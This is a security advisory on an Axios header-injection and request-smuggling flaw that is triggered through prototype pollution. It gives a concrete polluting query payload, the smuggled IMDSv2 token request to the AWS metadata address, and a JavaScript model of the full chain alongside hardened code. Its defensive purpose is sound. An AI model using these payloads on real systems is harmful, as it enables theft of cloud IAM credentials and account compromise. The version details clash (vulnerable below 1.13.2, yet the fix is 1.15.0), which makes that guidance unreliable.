Advisory

Axios Critical Vulnerability Enables Full Cloud Compromise via Prototype Pollution Gadget

Take action: If you use Axios in your applications, plan an update to version 1.15.0 or later now. The details are public, and the attack needs no direct user input to reach the vulnerable code path. Audit your dependency tree for prototype pollution vulnerabilities in libraries such as qs, minimist, and ini: those are what give attackers the entry point for this chain.


Learn More

Axios, a widely used JavaScript HTTP client, has disclosed a critical security flaw that can lead to a full cloud environment takeover. The vulnerability stems from missing header-value sanitization in the HTTP adapters, which turns an ordinary outbound request into a Server-Side Request Forgery (SSRF) primitive. The issue is dangerous because it requires no direct user input to trigger: Axios acts as a 'gadget' that is driven by an existing prototype pollution bug in some other dependency of the application stack.

Vulnerability summary:

The flaw is tracked as CVE-2026-40175 (CVSS score 10.0), a request smuggling and header injection vulnerability in the Axios HTTP adapter that occurs when configuration properties are merged from a polluted global object prototype. An attacker who can pollute Object.prototype through a third-party library such as qs or body-parser can inject CRLF characters into Axios headers and smuggle additional HTTP requests on the same connection. This mechanism can bypass controls such as AWS IMDSv2 to exfiltrate cloud metadata and IAM credentials.

A successful exploit allows attackers to move from a compromised application state to internal infrastructure. By smuggling a PUT request to the AWS Instance Metadata Service (169.254.169.254), an attacker can obtain an IMDSv2 session token and then the instance's IAM role credentials, compromising the cloud account to the extent of that role's permissions.

Here's a walkthrough with concrete payloads showing exactly what the attacker sends and what happens at each step.

Exploit example

Step 1 - The attacker sends a polluting payload. Suppose the application parses query strings with a version of qs that is vulnerable to prototype pollution. The attacker sends a request like:

GET /search?__proto__[x-amz-target]=dummy%0d%0a%0d%0aPUT%20/latest/api/token%20HTTP/1.1%0d%0aHost:%20169.254.169.254%0d%0aX-aws-ec2-metadata-token-ttl-seconds:%2021600%0d%0a%0d%0aGET%20/ignore

When qs parses this, it decodes the URL-encoded CRLF sequences and sets the property directly on Object.prototype:

Object.prototype['x-amz-target'] = 
  "dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\nX-aws-ec2-metadata-token-ttl-seconds: 21600\r\n\r\nGET /ignore";

At this point, every plain object in the application (anything that inherits from Object.prototype) exposes this property.

Step 2 - Axios prepares a normal request. Somewhere in the application, a completely innocent call fires:

await axios.get('https://analytics.internal/pings');

Internally, Axios builds its config by merging defaults, instance config, and per-request config. During this merge, it iterates over properties, and because x-amz-target now exists on Object.prototype, Axios picks it up as though it were a legitimate header:

// What Axios sees internally after merging:
{
  method: 'GET',
  url: 'https://analytics.internal/pings',
  headers: {
    'Accept': 'application/json',
    'User-Agent': 'axios/1.x',
    'x-amz-target': 'dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\n...'
  }
}

Step 3 - Axios writes the raw bytes to the socket. Because the vulnerable adapter does not validate header values for CRLF characters, the following goes onto the wire:

GET /pings HTTP/1.1
Host: analytics.internal
Accept: application/json
User-Agent: axios/1.x
x-amz-target: dummy

PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600

GET /ignore

The \r\n\r\n after dummy terminates the first request's headers. Everything that follows is interpreted as a completely separate HTTP request by the receiving server or any intermediary proxy, and the trailing partial GET /ignore line absorbs whatever the client writes after the injected header so it cannot corrupt the smuggled request. One caveat for practitioners: whether these bytes actually reach the socket also depends on the transport underneath the adapter. Node's built-in http client, for example, rejects CR and LF in header values with ERR_INVALID_CHAR. The value of the Axios patch is that it rejects such values inside the library, before any transport sees them.

Step 4 - The AWS metadata service responds to the smuggled request. The second request is a valid IMDSv2 token request. Note that the connection Axios opened is to analytics.internal, so the smuggled request only reaches 169.254.169.254 if that server, or a forward proxy between the application and it, routes requests by their Host header. Where it does, the metadata service processes the PUT and returns the token in the response body (IMDSv2 returns it as the body, not as a response header):

HTTP/1.1 200 OK
Content-Type: text/plain

AQAEAHjQ3Nym4x7K...truncated...

Step 5 - The attacker uses the token to steal credentials. With the IMDSv2 token captured, the attacker can send follow-up requests (using the same smuggling technique or a direct SSRF) that carry it in the X-aws-ec2-metadata-token request header to /latest/meta-data/iam/security-credentials/ and retrieve the IAM role credentials.
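The chain in Steps 1 to 5, end to end, as an added example that is not Axios or qs code. It uses deliberately simplified stand-ins written for this page: parsePollutingQuery mimics a query parser that does not reject __proto__ keys (the role qs plays in Step 1), and mergeHeadersVulnerable plus serializeRequest mimic an HTTP client that copies headers with for...in and writes values without a CRLF check (the role the advisory assigns to Axios). That Axios's own merge walks inherited keys in exactly this way is an assumption of the model. mergeHeadersHardened shows the two checks that break the chain: copying own keys only, and rejecting CR/LF in header values, the latter being the kind of validation the advisory says the patch adds. The query string and the header names are constructed to match Step 1.

```javascript
// Added example for this page: a model of the prototype-pollution -> header-injection
// gadget chain. Nothing here is Axios or qs code; every function is a stand-in.

// Step 1 stand-in: a query parser that does not reject "__proto__" as a key.
// "__proto__[x]=v" walks into Object.prototype and assigns x there.
function parsePollutingQuery(query) {
  const out = {};
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    const key = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const val = decodeURIComponent(eq < 0 ? '' : pair.slice(eq + 1));
    const m = key.match(/^([^\[]+)\[([^\]]+)\]$/);
    if (!m) { out[key] = val; continue; }
    const [, head, sub] = m;
    if (out[head] === undefined) out[head] = {};
    out[head][sub] = val;            // out['__proto__'] resolves to Object.prototype
  }
  return out;
}

// Step 2 stand-in (vulnerable): for...in copies inherited, polluted keys too.
function mergeHeadersVulnerable(...sources) {
  const merged = {};
  for (const src of sources) for (const k in src) merged[k] = src[k];
  return merged;
}

// Step 3 stand-in (vulnerable): header values go onto the wire unchecked.
function serializeRequest(method, path, host, headers) {
  let raw = `${method} ${path} HTTP/1.1\r\nHost: ${host}\r\n`;
  for (const [k, v] of Object.entries(headers)) raw += `${k}: ${v}\r\n`;
  return raw + '\r\n';
}

// What a line-oriented HTTP/1.1 parser on the far side sees: every complete
// request line in the byte stream. Two of them means a request was smuggled.
function requestLinesOnWire(raw) {
  return raw.split('\r\n').filter((l) => /^[A-Z]+ \S+ HTTP\/1\.1$/.test(l));
}

// Hardened merge: own keys only (defeats the gadget) and no CR/LF in values
// (the kind of check the advisory says the patch adds to the adapters).
function mergeHeadersHardened(...sources) {
  const merged = Object.create(null);
  for (const src of sources) {
    for (const k of Object.keys(src)) {
      const v = String(src[k]);
      if (/[\r\n]/.test(v)) throw new Error(`invalid character in header value for "${k}"`);
      merged[k] = v;
    }
  }
  return merged;
}

// Runs the whole chain on a constructed request and reports what each stage saw.
function runScenario() {
  const defaults = { Accept: 'application/json', 'User-Agent': 'axios/1.x' };
  // Constructed attacker query string, same shape as the advisory's Step 1.
  const query =
    '__proto__[x-amz-target]=dummy%0d%0a%0d%0aPUT%20/latest/api/token%20HTTP/1.1%0d%0a' +
    'Host:%20169.254.169.254%0d%0aX-aws-ec2-metadata-token-ttl-seconds:%2021600%0d%0a%0d%0aGET%20/ignore';
  try {
    parsePollutingQuery(query);
    const polluted = ({})['x-amz-target'] !== undefined;

    // Vulnerable path: an unrelated request now carries the polluted header.
    const vulnHeaders = mergeHeadersVulnerable(defaults, {});
    const wire = serializeRequest('GET', '/pings', 'analytics.internal', vulnHeaders);
    const requestLines = requestLinesOnWire(wire);

    // Hardened path 1: an own-keys merge never sees the inherited key.
    const hardenedKeys = Object.keys(mergeHeadersHardened(defaults, {}));

    // Hardened path 2: even an explicitly supplied CR/LF value is rejected.
    let crlfRejected = false;
    try { mergeHeadersHardened(defaults, { 'X-Trace': 'a\r\nInjected: b' }); }
    catch (e) { crlfRejected = /invalid character/.test(e.message); }

    return { polluted, vulnHeaderKeys: Object.keys(vulnHeaders), requestLines, hardenedKeys, crlfRejected };
  } finally {
    delete Object.prototype['x-amz-target'];  // undo the pollution so nothing else inherits it
  }
}
```

Call runScenario() from Node and inspect the result: requestLines holds both the legitimate GET /pings line and the smuggled PUT /latest/api/token line, vulnHeaderKeys contains x-amz-target, while hardenedKeys contains only the two genuine defaults and crlfRejected is true. The own-keys merge alone would already stop this particular gadget, but the CR/LF check is the defence that holds regardless of where a bad value came from, which is why it belongs in the client.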

The vulnerability affects all Axios versions from the 0.x branch up to, but not including, 1.13.2. The discovery followed a security audit started after a recent supply chain attack targeting the library's maintainer, Jason Saayman. Estimates suggest over 48,000 instances may be directly exposed to remote exploitation, though active attacks using this specific gadget have not yet been confirmed in the wild.

Organizations must update Axios to version 1.15.0 or later to fix the flaw. The patch adds validation in lib/adapters/http.js and xhr.js that rejects the request if a header value contains CR or LF characters. Developers should also check their entire dependency tree for prototype pollution vulnerabilities in libraries such as minimist, ini, and qs (npm audit, or npm ls with the package name, shows whether a vulnerable version is present, including as a transitive dependency) to remove the starting point for this attack chain.
